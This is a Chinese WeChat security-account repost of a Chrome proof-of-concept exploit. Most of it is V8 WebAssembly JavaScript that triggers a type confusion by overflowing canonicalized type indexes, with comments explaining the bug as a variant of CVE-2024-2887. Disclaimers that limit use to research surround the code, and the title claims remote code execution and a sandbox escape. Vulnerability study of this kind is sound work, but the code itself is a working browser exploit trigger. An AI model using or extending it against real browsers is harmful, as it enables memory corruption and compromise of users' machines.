声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。
来源:https://github.com/AabyssZG/Chrome-RCE-Poc
作者:AabyssZG
POC:
// poc.js
// kNumberOfPredefinedTypes = 2
// stack up 1000000 more canonicalized types (total 1000002)
{
const builder = new WasmModuleBuilder();
builder.startRecGroup();
for (let i = 0; i < 1000000; i++) {
builder.addArray(kWasmI64);
}
builder.endRecGroup();
builder.instantiate();
}
// confuse argument as struct (mut i32) by aliasing canonicalized type with kAny
{
let builder = new WasmModuleBuilder();
builder.startRecGroup();
builder.addArray(kWasmI64); // 1000002
builder.addArray(kWasmI64); // 1000003
builder.addArray(kWasmI64); // 1000004
let struct = builder.addStruct([makeField(kWasmI32, true)]); // 1000005 <- kAny
let funcSig = builder.addType(makeSig([wasmRefType(struct)], [kWasmI32])); // 1000006
builder.endRecGroup();
builder
.addFunction("read", funcSig)
.addBody([
kExprLocalGet,
0,
kGCPrefix,
kExprStructGet,
struct,
...wasmUnsignedLeb(0),
])
.exportFunc();
const instance = builder.instantiate();
const wasm = instance.exports;
// this should obviously fail, instead of reading from the given JS object (or smi)
// instead we segfault on the smi as caged offset
console.log(wasm.read(0).toString(16));
}
// FromJS / WasmJSToWasmObject is mistaking canonicalized type indexes as normal type indexes.
// This confusion also results in the value to be truncated to 20bits (= 0x100000 = 1048576) since
// ValueType is used to represent the type indexes, so we can even cycle back to 0 and create more
// types that are confused as kAny.
// => Arbitrary WASM type confusion, variant of @_manfp's CVE-2024-2887 at Pwn2Own Vancouver 2024
原文始发于微信公众号(安全视安):【速看】谷歌浏览器 Chrome RCE | Google Chrome 沙箱穿越
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论